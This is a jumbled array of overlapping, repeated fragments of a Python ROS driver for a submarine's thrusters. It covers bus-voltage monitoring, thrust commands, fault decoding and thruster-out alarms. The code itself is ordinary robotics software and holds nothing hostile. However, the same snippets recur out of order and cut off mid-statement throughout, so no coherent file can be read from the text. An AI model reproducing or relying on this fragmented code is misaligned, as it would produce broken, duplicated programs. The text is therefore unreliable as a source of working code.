"= condition_dim self.hidden_dim = hidden_dim self.device = device self.model = SequentialConditionalFlow(sum( [[MADE(flow_dim, condition_dim,",
"from .Shuffle import Shuffle from .Flow import SequentialConditionalFlow from .NormFunctions import ActNorm, RunningBatchNorm1d",
"ActNorm, RunningBatchNorm1d from utils.logger import log class MAF(nn.Module): def __init__(self, flow_dim, condition_dim, hidden_dim,",
"1)] \\ + [[MADE(flow_dim, condition_dim, hidden_dim, False)]], [])) self.model.to(device) self.prior = torch.distributions.Normal(torch.tensor(0., device=device),",
"(image + noise).clip(0., 1.) return torch.logit(self.alpha + (1 - 2 * self.alpha) *",
"import torch.nn as nn import torchvision.transforms as T from .MADE import MADE from",
"device=device), torch.tensor(1., device=device)) self.initialized = True def calc_loss(self, inputs, conditions): raise NotImplementedError def",
"inputs, conditions): raise NotImplementedError def forward_flow(self, inputs, conditions): in_shape = inputs.shape inputs =",
"AttributeError(\"Unknown dataset\") def __call__(self, image): image = self.base_transform(image) noise = (torch.rand_like(image) - 0.5)",
"ind in range(num_blocks - 1)] \\ + [[MADE(flow_dim, condition_dim, hidden_dim, False)]], [])) self.model.to(device)",
"inputs = inputs.reshape(-1, self.flow_dim) conditions = conditions.reshape(inputs.shape[0], self.condition_dim) if not self.initialized and inputs.shape[0]",
"path) def load(self, path): state_dict = torch.load(path, map_location=self.device) self.model.load_state_dict(state_dict[\"model\"]) self.optimizer.load_state_dict(state_dict[\"optimizer\"]) \"\"\" uniform noise",
"+ noise).clip(0., 1.) return torch.logit(self.alpha + (1 - 2 * self.alpha) * image)",
"z, logjac = self.model.forward_flow(inputs, conditions) return z.reshape(in_shape), logjac.reshape(in_shape[:-1]) def sample(self, conditions): batch_size =",
"\"mnist\": self.base_transform = T.Compose([T.ToTensor(), T.RandomHorizontalFlip()]) self.alpha = 0.01 else: raise AttributeError(\"Unknown dataset\") def",
"hidden_dim self.device = device self.model = SequentialConditionalFlow(sum( [[MADE(flow_dim, condition_dim, hidden_dim, ind == 0),",
"True z, logjac = self.model.forward_flow(inputs, conditions) return z.reshape(in_shape), logjac.reshape(in_shape[:-1]) def sample(self, conditions): batch_size",
"self.prior = torch.distributions.Normal(torch.tensor(0., device=device), torch.tensor(1., device=device)) self.initialized = True def calc_loss(self, inputs, conditions):",
"[[MADE(flow_dim, condition_dim, hidden_dim, ind == 0), RunningBatchNorm1d(flow_dim), ActNorm(flow_dim), Shuffle(torch.randperm(flow_dim))] \\ for ind in",
"class MAF(nn.Module): def __init__(self, flow_dim, condition_dim, hidden_dim, num_blocks, device): super(MAF, self).__init__() self.flow_dim =",
"dequantize input logit(a + (1 - 2a) * image) as in paper \"\"\"",
"# hack todo fix? with torch.no_grad(): self.model.data_init(inputs, conditions) self.initialized = True z, logjac",
"image): image = self.base_transform(image) noise = (torch.rand_like(image) - 0.5) * (1/256.) image =",
"inputs, conditions): in_shape = inputs.shape inputs = inputs.reshape(-1, self.flow_dim) conditions = conditions.reshape(inputs.shape[0], self.condition_dim)",
"torch import torch.nn as nn import torchvision.transforms as T from .MADE import MADE",
"self.model.forward_flow(inputs, conditions) return z.reshape(in_shape), logjac.reshape(in_shape[:-1]) def sample(self, conditions): batch_size = conditions.shape[0] with torch.no_grad():",
"paper \"\"\" class MAFImageTransform(): def __init__(self, dataset): if dataset == \"mnist\": self.base_transform =",
"sample(self, conditions): batch_size = conditions.shape[0] with torch.no_grad(): z = self.prior.sample([batch_size, self.flow_dim]) x, _",
"SequentialConditionalFlow(sum( [[MADE(flow_dim, condition_dim, hidden_dim, ind == 0), RunningBatchNorm1d(flow_dim), ActNorm(flow_dim), Shuffle(torch.randperm(flow_dim))] \\ for ind",
"MADE from .Shuffle import Shuffle from .Flow import SequentialConditionalFlow from .NormFunctions import ActNorm,",
"range(num_blocks - 1)] \\ + [[MADE(flow_dim, condition_dim, hidden_dim, False)]], [])) self.model.to(device) self.prior =",
"self.optimizer.load_state_dict(state_dict[\"optimizer\"]) \"\"\" uniform noise to dequantize input logit(a + (1 - 2a) *",
"self.base_transform = T.Compose([T.ToTensor(), T.RandomHorizontalFlip()]) self.alpha = 0.01 else: raise AttributeError(\"Unknown dataset\") def __call__(self,",
"forward_flow(self, inputs, conditions): in_shape = inputs.shape inputs = inputs.reshape(-1, self.flow_dim) conditions = conditions.reshape(inputs.shape[0],",
"MAF(nn.Module): def __init__(self, flow_dim, condition_dim, hidden_dim, num_blocks, device): super(MAF, self).__init__() self.flow_dim = flow_dim",
"= flow_dim self.condition_dim = condition_dim self.hidden_dim = hidden_dim self.device = device self.model =",
"as in paper \"\"\" class MAFImageTransform(): def __init__(self, dataset): if dataset == \"mnist\":",
"hidden_dim, False)]], [])) self.model.to(device) self.prior = torch.distributions.Normal(torch.tensor(0., device=device), torch.tensor(1., device=device)) self.initialized = True",
"= hidden_dim self.device = device self.model = SequentialConditionalFlow(sum( [[MADE(flow_dim, condition_dim, hidden_dim, ind ==",
"condition_dim, hidden_dim, num_blocks, device): super(MAF, self).__init__() self.flow_dim = flow_dim self.condition_dim = condition_dim self.hidden_dim",
"self.device = device self.model = SequentialConditionalFlow(sum( [[MADE(flow_dim, condition_dim, hidden_dim, ind == 0), RunningBatchNorm1d(flow_dim),",
"conditions): raise NotImplementedError def forward_flow(self, inputs, conditions): in_shape = inputs.shape inputs = inputs.reshape(-1,",
"inputs.reshape(-1, self.flow_dim) conditions = conditions.reshape(inputs.shape[0], self.condition_dim) if not self.initialized and inputs.shape[0] != 1:",
".NormFunctions import ActNorm, RunningBatchNorm1d from utils.logger import log class MAF(nn.Module): def __init__(self, flow_dim,",
"conditions) return z.reshape(in_shape), logjac.reshape(in_shape[:-1]) def sample(self, conditions): batch_size = conditions.shape[0] with torch.no_grad(): z",
"def sample(self, conditions): batch_size = conditions.shape[0] with torch.no_grad(): z = self.prior.sample([batch_size, self.flow_dim]) x,",
"x, _ = self.model.inverse_flow(z, conditions) return x def save(self, path): torch.save({ \"model\": self.model.state_dict(),",
"def save(self, path): torch.save({ \"model\": self.model.state_dict(), \"optimizer\": self.optimizer.state_dict(), }, path) def load(self, path):",
"load(self, path): state_dict = torch.load(path, map_location=self.device) self.model.load_state_dict(state_dict[\"model\"]) self.optimizer.load_state_dict(state_dict[\"optimizer\"]) \"\"\" uniform noise to dequantize",
"log class MAF(nn.Module): def __init__(self, flow_dim, condition_dim, hidden_dim, num_blocks, device): super(MAF, self).__init__() self.flow_dim",
"+ (1 - 2a) * image) as in paper \"\"\" class MAFImageTransform(): def",
"flow_dim self.condition_dim = condition_dim self.hidden_dim = hidden_dim self.device = device self.model = SequentialConditionalFlow(sum(",
"self.hidden_dim = hidden_dim self.device = device self.model = SequentialConditionalFlow(sum( [[MADE(flow_dim, condition_dim, hidden_dim, ind",
"conditions.shape[0] with torch.no_grad(): z = self.prior.sample([batch_size, self.flow_dim]) x, _ = self.model.inverse_flow(z, conditions) return",
"fix? with torch.no_grad(): self.model.data_init(inputs, conditions) self.initialized = True z, logjac = self.model.forward_flow(inputs, conditions)",
"path): torch.save({ \"model\": self.model.state_dict(), \"optimizer\": self.optimizer.state_dict(), }, path) def load(self, path): state_dict =",
"(1 - 2a) * image) as in paper \"\"\" class MAFImageTransform(): def __init__(self,",
"= self.model.inverse_flow(z, conditions) return x def save(self, path): torch.save({ \"model\": self.model.state_dict(), \"optimizer\": self.optimizer.state_dict(),",
"+ [[MADE(flow_dim, condition_dim, hidden_dim, False)]], [])) self.model.to(device) self.prior = torch.distributions.Normal(torch.tensor(0., device=device), torch.tensor(1., device=device))",
"self).__init__() self.flow_dim = flow_dim self.condition_dim = condition_dim self.hidden_dim = hidden_dim self.device = device",
"nn import torchvision.transforms as T from .MADE import MADE from .Shuffle import Shuffle",
"conditions.reshape(inputs.shape[0], self.condition_dim) if not self.initialized and inputs.shape[0] != 1: # hack todo fix?",
"self.flow_dim) conditions = conditions.reshape(inputs.shape[0], self.condition_dim) if not self.initialized and inputs.shape[0] != 1: #",
"from .MADE import MADE from .Shuffle import Shuffle from .Flow import SequentialConditionalFlow from",
"uniform noise to dequantize input logit(a + (1 - 2a) * image) as",
"self.model = SequentialConditionalFlow(sum( [[MADE(flow_dim, condition_dim, hidden_dim, ind == 0), RunningBatchNorm1d(flow_dim), ActNorm(flow_dim), Shuffle(torch.randperm(flow_dim))] \\",
"noise to dequantize input logit(a + (1 - 2a) * image) as in",
"class MAFImageTransform(): def __init__(self, dataset): if dataset == \"mnist\": self.base_transform = T.Compose([T.ToTensor(), T.RandomHorizontalFlip()])",
"self.condition_dim) if not self.initialized and inputs.shape[0] != 1: # hack todo fix? with",
"and inputs.shape[0] != 1: # hack todo fix? with torch.no_grad(): self.model.data_init(inputs, conditions) self.initialized",
"self.initialized = True z, logjac = self.model.forward_flow(inputs, conditions) return z.reshape(in_shape), logjac.reshape(in_shape[:-1]) def sample(self,",
"self.condition_dim = condition_dim self.hidden_dim = hidden_dim self.device = device self.model = SequentialConditionalFlow(sum( [[MADE(flow_dim,",
"dataset): if dataset == \"mnist\": self.base_transform = T.Compose([T.ToTensor(), T.RandomHorizontalFlip()]) self.alpha = 0.01 else:",
"= 0.01 else: raise AttributeError(\"Unknown dataset\") def __call__(self, image): image = self.base_transform(image) noise",
"noise = (torch.rand_like(image) - 0.5) * (1/256.) image = (image + noise).clip(0., 1.)",
"== \"mnist\": self.base_transform = T.Compose([T.ToTensor(), T.RandomHorizontalFlip()]) self.alpha = 0.01 else: raise AttributeError(\"Unknown dataset\")",
"import SequentialConditionalFlow from .NormFunctions import ActNorm, RunningBatchNorm1d from utils.logger import log class MAF(nn.Module):",
"torch.load(path, map_location=self.device) self.model.load_state_dict(state_dict[\"model\"]) self.optimizer.load_state_dict(state_dict[\"optimizer\"]) \"\"\" uniform noise to dequantize input logit(a + (1",
"return x def save(self, path): torch.save({ \"model\": self.model.state_dict(), \"optimizer\": self.optimizer.state_dict(), }, path) def",
"device self.model = SequentialConditionalFlow(sum( [[MADE(flow_dim, condition_dim, hidden_dim, ind == 0), RunningBatchNorm1d(flow_dim), ActNorm(flow_dim), Shuffle(torch.randperm(flow_dim))]",
"RunningBatchNorm1d(flow_dim), ActNorm(flow_dim), Shuffle(torch.randperm(flow_dim))] \\ for ind in range(num_blocks - 1)] \\ + [[MADE(flow_dim,",
"= True z, logjac = self.model.forward_flow(inputs, conditions) return z.reshape(in_shape), logjac.reshape(in_shape[:-1]) def sample(self, conditions):"
] |
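A minimal smoke-test sketch for the MAF class above. It assumes the package's relative imports (MADE, SequentialConditionalFlow, RunningBatchNorm1d, ActNorm, Shuffle) resolve and that data_init accepts a full batch; the dimensions (784, 10, 512, 5 blocks) are illustrative placeholders, not values from the original project.

import torch

# Hypothetical dimensions: 784 = flattened 28x28 MNIST, 10 = condition vector.
flow = MAF(flow_dim=784, condition_dim=10, hidden_dim=512, num_blocks=5, device='cpu')

x = torch.randn(16, 784)    # batch of flattened images
cond = torch.randn(16, 10)  # conditioning vectors

z, logjac = flow.forward_flow(x, cond)  # z: (16, 784), logjac: (16,)
samples = flow.sample(cond)             # inverse pass from prior noise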
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***

import warnings
import pulumi
import pulumi.runtime
from typing import Any, Dict, List, Mapping, Optional, Tuple, Union
from .. import _utilities, _tables

__all__ = [
    'MappingMappingArgs',
]


@pulumi.input_type
class MappingMappingArgs:
    def __init__(__self__, *,
                 expression: pulumi.Input[str],
                 id: pulumi.Input[str],
                 push_status: Optional[pulumi.Input[str]] = None):
        pulumi.set(__self__, "expression", expression)
        pulumi.set(__self__, "id", id)
        if push_status is not None:
            pulumi.set(__self__, "push_status", push_status)

    @property
    @pulumi.getter
    def expression(self) -> pulumi.Input[str]:
        return pulumi.get(self, "expression")

    @expression.setter
    def expression(self, value: pulumi.Input[str]):
        pulumi.set(self, "expression", value)

    @property
    @pulumi.getter
    def id(self) -> pulumi.Input[str]:
        return pulumi.get(self, "id")

    @id.setter
    def id(self, value: pulumi.Input[str]):
        pulumi.set(self, "id", value)

    @property
    @pulumi.getter(name="pushStatus")
    def push_status(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "push_status")

    @push_status.setter
    def push_status(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "push_status", value)
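Generated input types like this are normally built by a Pulumi program and passed to a resource constructor, but they can be exercised directly. A small sketch with invented field values (not from the original provider):

args = MappingMappingArgs(
    expression='^/admin/.*',  # hypothetical ruleset expression
    id='mapping-1',           # hypothetical mapping id
    push_status='attempted',
)

print(args.expression)        # getters go through pulumi.get
args.push_status = None      # optional field; setters go through pulumi.set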
import copy
import threading
import argparse

import numpy as np
import rospy
import rospkg
import rosparam
from geometry_msgs.msg import Vector3
from std_msgs.msg import Header, Float64
from sub8_msgs.msg import Thrust, ThrusterStatus
from mil_ros_tools import wait_for_param, thread_lock, numpy_to_point
from sub8_msgs.srv import ThrusterInfo, ThrusterInfoResponse, FailThruster, UnfailThruster
from sub8_thruster_comm import thruster_comm_factory
from ros_alarms import AlarmBroadcaster, AlarmListener

lock = threading.Lock()


class BusVoltageMonitor(object):
    '''
    Class that estimates sub8's thruster bus voltage.
    As of May 2017, this is just a simple rolling average with a constant width
    sliding window. However add_reading and get_estimate methods are left for
    when smarter filtering is needed
    '''
    VMAX = 50  # volts
    VMIN = 0   # volts

    class VoltageReading(object):
        def __init__(self, voltage, time):
            self.v = voltage
            self.t = time

    def __init__(self, window_duration):
        '''
        window_duration - float (amount of seconds for which to keep a reading in the buffer)
        '''
        self.bus_voltage_alarm = AlarmBroadcaster("bus-voltage")
        self.bus_voltage_pub = rospy.Publisher('bus_voltage', Float64, queue_size=1)
        self.warn_voltage = rospy.get_param("/battery/warn_voltage", 44.5)
        self.kill_voltage = rospy.get_param("/battery/kill_voltage", 44.0)
        self.last_estimate_time = rospy.Time.now()
        self.WINDOW_DURATION = rospy.Duration(window_duration)
        self.ESTIMATION_PERIOD = rospy.Duration(0.2)
        self.cached_severity = 0
        self.buffer = []

    def add_reading(self, voltage, time):
        ''' Adds voltage readings to buffer '''
        voltage = float(voltage)

        # Only add if it makes sense (the M5's will give nonsense feedback at times)
        if voltage >= self.VMIN and voltage <= self.VMAX:
            self.buffer.append(self.VoltageReading(voltage, time))
            self.prune_buffer()

        # check bus voltage if enough time has passed
        if rospy.Time.now() - self.last_estimate_time > self.ESTIMATION_PERIOD:
            self.check_bus_voltage()

    def prune_buffer(self):
        ''' Removes readings older than the window_duration from buffer '''
        now = rospy.Time.now()
        self.buffer = [reading for reading in self.buffer
                       if now - reading.t <= self.WINDOW_DURATION]

    def get_voltage_estimate(self):
        ''' Returns average voltage in buffer '''
        if len(self.buffer) == 0:
            return None
        voltages = [r.v for r in self.buffer]
        return np.mean(voltages)

    def check_bus_voltage(self):
        ''' Publishes bus_voltage estimate and raises alarm if necessary '''
        bus_voltage = self.get_voltage_estimate()
        if bus_voltage is None:
            return
        self.bus_voltage_pub.publish(Float64(bus_voltage))
        severity = None
        if bus_voltage < self.warn_voltage:
            severity = 3
        if bus_voltage < self.kill_voltage:
            severity = 5
        if severity is not None and self.cached_severity != severity:
            self.bus_voltage_alarm.raise_alarm(
                problem_description='Bus voltage has fallen to {}'.format(bus_voltage),
                parameters={'bus_voltage': bus_voltage},
                severity=severity
            )
            self.cached_severity = severity
"alarm if necessary self.bus_voltage_monitor.add_reading(message_keyword_args['bus_v'], rospy.Time.now()) # Undervolt/overvolt faults are unreliable (might not still",
"in self.ports.values(): for thruster_name in port.online_thruster_names.copy(): self.command_thruster(thruster_name, 0.0) def fail_thruster(self, srv): ''' Makes",
"np.mean(voltages) def check_bus_voltage(self): ''' Publishes bus_voltage estimate and raises alarm if necessary '''",
"# Alarms self.thruster_out_alarm = AlarmBroadcaster(\"thruster-out\") AlarmListener(\"thruster-out\", self.check_alarm_status, call_when_raised=False) # Prevent outside interference #",
"self.thruster_to_port_map[thruster_name] = port_info['port'] if thruster_name not in self.ports[port_name].online_thruster_names: rospy.logerr(\"ThrusterDriver: {} IS MISSING!\".format(thruster_name)) else:",
"raise alarm if necessary self.bus_voltage_monitor.add_reading(message_keyword_args['bus_v'], rospy.Time.now()) # Undervolt/overvolt faults are unreliable (might not",
"rospy.logerr(\"ThrusterDriver: {} IS MISSING!\".format(thruster_name)) else: rospy.loginfo(\"ThrusterDriver: {} registered\".format(thruster_name)) # Set firmware settings port",
"self.WINDOW_DURATION: self.buffer.remove(reading) def get_voltage_estimate(self): ''' Returns average voltage in buffer ''' voltages =",
"rospkg import rosparam import threading import argparse from geometry_msgs.msg import Vector3 from std_msgs.msg",
"will give nonsense feedback at times) if voltage >= self.VMIN and voltage <=",
"offline_names = list(self.failed_thrusters) if len(self.failed_thrusters) > 0: self.thruster_out_alarm.raise_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}, severity=int(np.clip(len(self.failed_thrusters), 1,",
"0: self.thruster_out_alarm.raise_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}, severity=int(np.clip(len(self.failed_thrusters), 1, 5))) else: self.thruster_out_alarm.clear_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names})",
"in fault_codes.items(): if code & fault != 0: faults.append(fault_name) rospy.logwarn(\"Thruster: {} has entered",
"are good self.deactivated_thrusters.add(srv.thruster_name) # So that thruster_mapper updates the B-matrix self.update_thruster_out_alarm() return {}",
"x in self.failed_thrusters} for thrust_cmd in list(msg.thruster_commands): self.command_thruster(thrust_cmd.name, thrust_cmd.thrust) # Raise or clear",
"age > self.WINDOW_DURATION: self.buffer.remove(reading) def get_voltage_estimate(self): ''' Returns average voltage in buffer '''",
"if thrust < thruster_model.thrust_bounds[0] or thrust > thruster_model.thrust_bounds[1]: rospy.logwarn('Tried to command thrust ({})",
"in self.failed_thrusters: self.failed_thrusters.add(offline) # Thruster went offline for failed in copy.deepcopy(self.failed_thrusters): if (failed",
"AlarmListener(\"thruster-out\", self.check_alarm_status, call_when_raised=False) # Prevent outside interference # Create ThrusterPort objects in a",
"''' query_name = srv.thruster_name info = self.ports[self.thruster_to_port_map[query_name]].thruster_info[query_name] thruster_info = ThrusterInfoResponse( node_id=info.node_id, min_force=info.thrust_bounds[0], max_force=info.thrust_bounds[1],",
"= 1.0 # s _window_duration = 30.0 # s _NODE_NAME = rospy.get_name() def",
"effect def get_thruster_info(self, srv): ''' Get the thruster info for a particular thruster",
"= BusVoltageMonitor(self._window_duration) # Command thrusters self.thrust_sub = rospy.Subscriber('thrusters/thrust', Thrust, self.thrust_cb, queue_size=1) # To",
"for simulation, based on parameter '/simulate'\") # Instantiate thruster comms port for port_info",
"good (user managed) # Alarms self.thruster_out_alarm = AlarmBroadcaster(\"thruster-out\") AlarmListener(\"thruster-out\", self.check_alarm_status, call_when_raised=False) # Prevent",
"the configured thrust bounds is commanded Raises UnavailableThrusterException if a thruster that is",
"available before things will work rospy.wait_for_service(\"update_thruster_layout\") self.update_thruster_out_alarm() # Bus voltage self.bus_voltage_monitor = BusVoltageMonitor(self._window_duration)",
"clears the thruster out alarm Updates the 'offline_thruster_names' parameter accordingly Sets the severity",
"<< 3): 'OVERTEMP', (1 << 4): 'STALL', (1 << 5): 'STALL_WARN', } fault",
"srv): ''' Undoes effect of self.fail_thruster ''' self.failed_thrusters.remove(srv.thruster_name) self.deactivated_thrusters.remove(srv.thruster_name) self.update_thruster_out_alarm() return {} if",
"desc_msg = \"Specify a path to the configuration.json file containing the thrust calibration",
"& fault != 0: faults.append(fault_name) rospy.logwarn(\"Thruster: {} has entered fault with status {}\".format(name,",
"it makes sense (the M5's will give nonsense feedback at times) if voltage",
"data\" parser = argparse.ArgumentParser(usage=usage_msg, description=desc_msg) args = parser.parse_args(rospy.myargv()[1:]) rospy.init_node('videoray_m5_thruster_driver') layout_parameter = '/thruster_layout' rospy.loginfo(\"Thruster",
"rospy.wait_for_service(\"update_thruster_layout\") self.update_thruster_out_alarm() # Bus voltage self.bus_voltage_monitor = BusVoltageMonitor(self._window_duration) # Command thrusters self.thrust_sub =",
"self.thrust_sub = rospy.Subscriber('thrusters/thrust', Thrust, self.thrust_cb, queue_size=1) # To programmatically deactivate thrusters self.fail_thruster_server =",
"So that it won't come back online even if comms are good self.deactivated_thrusters.add(srv.thruster_name)",
"in self.failed_thrusters: if not np.isclose(thrust, 0): rospy.logwarn('ThrusterDriver: commanding non-zero thrust to offline thruster",
"for key in message_contents} power = thruster_status['bus_v'] * thruster_status['bus_i'] self.status_publishers[name].publish( ThrusterStatus( header=Header(stamp=rospy.Time.now()), name=name,",
"thruster Example names are BLR, FLH, etc. Raises RuntimeError if a thrust value",
"to the list of failed thrusters, it will raise and alarm ''' failed_before",
"''' Adds voltage readings to buffer ''' voltage = float(voltage) # Only add",
"thrust commands These messages contain a list of instructions, one for each thruster",
"self.kill_voltage: severity = 5 if severity is not None and self.cached_severity != severity:",
"< self.kill_voltage: severity = 5 if severity is not None and self.cached_severity !=",
"in self.failed_thrusters} for thrust_cmd in list(msg.thruster_commands): self.command_thruster(thrust_cmd.name, thrust_cmd.thrust) # Raise or clear 'thruster-out'",
"readings older than the window_duration from buffer ''' for reading in self.buffer: age",
"and configure if present for thruster_name in port_info['thruster_names']: self.thruster_to_port_map[thruster_name] = port_info['port'] if thruster_name",
"Float64, queue_size=1) self.warn_voltage = rospy.get_param(\"/battery/warn_voltage\", 44.5) self.kill_voltage = rospy.get_param(\"/battery/kill_voltage\", 44.0) self.last_estimate_time = rospy.Time.now()",
"command_thruster(self, name, thrust): ''' Issue a a force command (in Newtons) to a",
"code & fault != 0: faults.append(fault_name) rospy.logwarn(\"Thruster: {} has entered fault with status",
"a reading in the buffer) ''' self.bus_voltage_alarm = AlarmBroadcaster(\"bus-voltage\") self.bus_voltage_pub = rospy.Publisher('bus_voltage', Float64,",
"fault with status {}\".format(name, message_keyword_args)) rospy.logwarn(\"Fault causes are: {}\".format(faults)) return def thrust_cb(self, msg):",
"be true - David) if message_keyword_args['fault'] > 2: fault_codes = { (1 <<",
") # Will publish bus_voltage and raise alarm if necessary self.bus_voltage_monitor.add_reading(message_keyword_args['bus_v'], rospy.Time.now()) #",
"{} registered\".format(thruster_name)) # Set firmware settings port = self.ports[port_name] node_id = thruster_definitions[thruster_name]['node_id'] config_path",
"objects in a dict indexed by port name self.load_thruster_ports(ports_layout, thruster_definitions) # Feedback on",
"blocks until it can use this service) self.thruster_info_service = rospy.Service('thrusters/thruster_info', ThrusterInfo, self.get_thruster_info) self.status_publishers",
"Thrust, self.thrust_cb, queue_size=1) # To programmatically deactivate thrusters self.fail_thruster_server = rospy.Service('fail_thruster', FailThruster, self.fail_thruster)",
"voltage self.t = time def __init__(self, window_duration): ''' window_duration - float (amount of",
"the particular thruster ''' self.failed_thrusters = set() # This is only determined by",
"for port in self.ports.values(): for thruster_name in port.online_thruster_names.copy(): self.command_thruster(thruster_name, 0.0) def fail_thruster(self, srv):",
"are good (user managed) # Alarms self.thruster_out_alarm = AlarmBroadcaster(\"thruster-out\") AlarmListener(\"thruster-out\", self.check_alarm_status, call_when_raised=False) #",
"or offline offline_on_port = target_port.get_offline_thruster_names() for offline in offline_on_port: if offline not in",
"or clears the thruster out alarm Updates the 'offline_thruster_names' parameter accordingly Sets the",
"thruster If there are any updates to the list of failed thrusters, it",
"''' failed_before = {x for x in self.failed_thrusters} for thrust_cmd in list(msg.thruster_commands): self.command_thruster(thrust_cmd.name,",
"age = rospy.Time.now() - reading.t if age > self.WINDOW_DURATION: self.buffer.remove(reading) def get_voltage_estimate(self): '''",
"a force command (in Newtons) to a named thruster Example names are BLR,",
"ThrusterPort objects ''' self.ports = {} # ThrusterPort objects self.thruster_to_port_map = {} #",
"= {name: rospy.Publisher('thrusters/status/' + name, ThrusterStatus, queue_size=10) for name in self.thruster_to_port_map.keys()} # These",
"+ name, ThrusterStatus, queue_size=10) for name in self.thruster_to_port_map.keys()} # These alarms require this",
"def prune_buffer(self): ''' Removes readings older than the window_duration from buffer ''' for",
"effort) # Keep track of thrusters going online or offline offline_on_port = target_port.get_offline_thruster_names()",
"a thrust_dict, which maps thruster names to the appropriate port - Given a",
"of self.fail_thruster ''' self.failed_thrusters.remove(srv.thruster_name) self.deactivated_thrusters.remove(srv.thruster_name) self.update_thruster_out_alarm() return {} if __name__ == '__main__': PKG",
"bad if thruster_status is None: return message_contents = [ 'rpm', 'bus_v', 'bus_i', 'temp',",
"offline_names}, severity=int(np.clip(len(self.failed_thrusters), 1, 5))) else: self.thruster_out_alarm.clear_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}) @thread_lock(lock) def command_thruster(self, name,",
"{} with settings specified in {}.'.format(thruster_name, config_path)) port.set_registers_from_dict(node_id=node_id, reg_dict=rosparam.load_file(config_path)[0][0]) port.reboot_thruster(node_id) # Necessary for",
"{}\".format(faults)) return def thrust_cb(self, msg): ''' Callback for receiving thrust commands These messages",
"to take effect def get_thruster_info(self, srv): ''' Get the thruster info for a",
"''' # So that thrust is not allocated to the thruster self.failed_thrusters.add(srv.thruster_name) #",
"value outside of the configured thrust bounds is commanded Raises UnavailableThrusterException if a",
"for receiving thrust commands These messages contain a list of instructions, one for",
"= argparse.ArgumentParser(usage=usage_msg, description=desc_msg) args = parser.parse_args(rospy.myargv()[1:]) rospy.init_node('videoray_m5_thruster_driver') layout_parameter = '/thruster_layout' rospy.loginfo(\"Thruster Driver waiting",
"if code & fault != 0: faults.append(fault_name) rospy.logwarn(\"Thruster: {} has entered fault with",
"back online even if comms are good (user managed) # Alarms self.thruster_out_alarm =",
"Updates the 'offline_thruster_names' parameter accordingly Sets the severity to the number of failed",
"ThrusterDriver(object): _dropped_timeout = 1.0 # s _window_duration = 30.0 # s _NODE_NAME =",
"get_voltage_estimate(self): ''' Returns average voltage in buffer ''' voltages = [] if len(self.buffer)",
"self.failed_thrusters.remove(failed) # Thruster came online # Don't try to do anything if the",
"= 0 # volts class VoltageReading(object): def __init__(self, voltage, time): self.v = voltage",
"raise IOError('/thruster_layout rosparam needs to be set before launching the thruster driver') thruster_driver",
"2017, this is just a simple rolling average with a constant width sliding",
"if it makes sense (the M5's will give nonsense feedback at times) if",
"a path to the configuration.json file containing the thrust calibration data\" parser =",
"def command_thruster(self, name, thrust): ''' Issue a a force command (in Newtons) to",
"of physical thrust bounds ({})'.format( thrust, thruster_model.thrust_bounds)) if name in self.failed_thrusters: if not",
"'OVERRVOLT', (1 << 2): 'OVERCURRENT', (1 << 3): 'OVERTEMP', (1 << 4): 'STALL',",
"ports_layout, thruster_definitions): '''Thruster driver, an object for commanding all of the sub's thrusters",
"particular thruster ''' self.failed_thrusters = set() # This is only determined by comms",
"AlarmBroadcaster(\"bus-voltage\") self.bus_voltage_pub = rospy.Publisher('bus_voltage', Float64, queue_size=1) self.warn_voltage = rospy.get_param(\"/battery/warn_voltage\", 44.5) self.kill_voltage = rospy.get_param(\"/battery/kill_voltage\",",
"# Undervolt/overvolt faults are unreliable (might not still be true - David) if",
"''' self.bus_voltage_alarm = AlarmBroadcaster(\"bus-voltage\") self.bus_voltage_pub = rospy.Publisher('bus_voltage', Float64, queue_size=1) self.warn_voltage = rospy.get_param(\"/battery/warn_voltage\", 44.5)",
"> 2: fault_codes = { (1 << 0): 'UNDERVOLT', (1 << 1): 'OVERRVOLT',",
"self.update_thruster_out_alarm() return {} if __name__ == '__main__': PKG = 'sub8_videoray_m5_thruster' usage_msg = \"Interface",
"(1 << 0): 'UNDERVOLT', (1 << 1): 'OVERRVOLT', (1 << 2): 'OVERCURRENT', (1",
"Class that estimates sub8's thruster bus voltage. As of May 2017, this is",
"= rospkg.RosPack() self.make_fake = rospy.get_param('simulate', False) if self.make_fake: rospy.logwarn(\"Running fake thrusters for simulation,",
"'OVERTEMP', (1 << 4): 'STALL', (1 << 5): 'STALL_WARN', } fault = int(message_keyword_args['fault'])",
"Commands 0 thrust to all thrusters ''' for port in self.ports.values(): for thruster_name",
"!= self._NODE_NAME: self.update_thruster_out_alarm() def update_thruster_out_alarm(self): ''' Raises or clears the thruster out alarm",
"offline is commanded a non-zero thrust ''' port_name = self.thruster_to_port_map[name] target_port = self.ports[port_name]",
"effort=effort, thrust=thrust, **message_keyword_args ) ) # Will publish bus_voltage and raise alarm if",
"by comms self.deactivated_thrusters = set() # These will not come back online even",
"config_path)) port.set_registers_from_dict(node_id=node_id, reg_dict=rosparam.load_file(config_path)[0][0]) port.reboot_thruster(node_id) # Necessary for some settings to take effect def",
"self.bus_voltage_monitor.add_reading(message_keyword_args['bus_v'], rospy.Time.now()) # Undervolt/overvolt faults are unreliable (might not still be true -",
"return self.bus_voltage_pub.publish(Float64(bus_voltage)) severity = None if bus_voltage < self.warn_voltage: severity = 3 if",
"Will publish bus_voltage and raise alarm if necessary self.bus_voltage_monitor.add_reading(message_keyword_args['bus_v'], rospy.Time.now()) # Undervolt/overvolt faults",
"Get the thruster info for a particular thruster name ''' query_name = srv.thruster_name",
"thruster that is offline is commanded a non-zero thrust ''' port_name = self.thruster_to_port_map[name]",
"back thruster_status = target_port.command_thruster(name, effort) # Keep track of thrusters going online or",
"alarm): # If someone else cleared this alarm, we need to make sure",
"when smarter filtering is needed ''' VMAX = 50 # volts VMIN =",
"# Thruster went offline for failed in copy.deepcopy(self.failed_thrusters): if (failed in target_port.get_declared_thruster_names() and",
"name + ')') effort = target_port.thruster_info[name].get_effort_from_thrust(thrust) # We immediately get thruster_status back thruster_status",
"thruster_model.thrust_bounds[1]: rospy.logwarn('Tried to command thrust ({}) outside of physical thrust bounds ({})'.format( thrust,",
